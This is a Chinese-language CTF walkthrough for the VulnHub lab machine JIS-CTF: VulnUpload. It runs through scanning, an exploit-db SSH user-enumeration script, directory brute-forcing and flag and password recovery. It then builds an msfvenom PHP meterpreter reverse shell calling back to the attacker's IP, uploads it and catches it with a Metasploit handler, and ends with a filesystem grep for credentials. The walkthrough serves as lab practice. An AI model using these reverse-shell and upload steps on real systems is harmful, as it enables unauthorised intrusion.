仅供个人娱乐
靶机信息
下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
一、网卡设置
设置为NAT模式,
使用vi去修改/etc/network/interface
修改保存重启,启动网卡username 3: technawi password : 3vilH@ksor
二、主机探测
nmap -sn 192.168.47.0/24
nmap -n -vv -T5 -sn 192.168.47.0/24 | grep -B 1 'Host is up'
三、端口扫描
JIS 在 22 端口开启了 SSH(OpenSSH 7.2p2)、80 端口开启 HTTP(Apache httpd 2.4.18)等两个服务。另外,操作系统为 ubuntu。这三个信息将成为下个阶段的主要攻击面。
cd /usr/share/exploitdb/exploits/linux/remote/
python 40136.py -U '/root/user.txt' -e 192.168.47.137
searchsploit openssh
有两个漏洞,依次为本地提权的漏洞、远程命令执行漏洞。
对前者而言,当前没用任何据点(如webshell),还谈不上提权操作,当前只能先放放,后续可能用的上;
对后者来说,利用条件非常严苛,攻击者必须拿到 forwardedagent-socket 的控制权,而且目标必须 SSH 登录攻击者所控制 forwarded agent-socket的那台机器,才可能让目标加载指定 *.so,实现远程命令执行。
漏洞为漏洞内存泄漏的漏洞
查看web页面
首先查看源码
dirb http://192.168.47.137
通过 engagement tools – discover content,启用子目录枚举功能
这里已经知道了后端语言是php,所以就只枚举php文件
爬取网站
在sitemap搜索一下flag
The 1st flag is : {8734509128730458630012095}
The 2nd flag is : {7412574125871236547895214}
username : admin
password : 3v1l_H@ck3r
上传文件
我们爬到的uploads跟uploaded_files文件夹,去尝试访问
msfvenom --payload php/meterpreter/reverse_tcp LHOST=192.168.47.128 LPORT=4444 --format raw --out ./php.php
上传木马
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload /php/meterpreter/reverse_tcp
se[-] The value specified for payload is not valid.
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set Lhost 192.168.47.128
Lhost => 192.168.47.128
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run
信息收集
发现了在technawi的用户目录下有.sudo_as_admin_successful文件,所以我们只要拥有technawi用户,就有root权限
再去找找文件中有没technawi
grep -ri --exclude-dir=proc/ 'technawi' / 2> /dev/null
ssh登录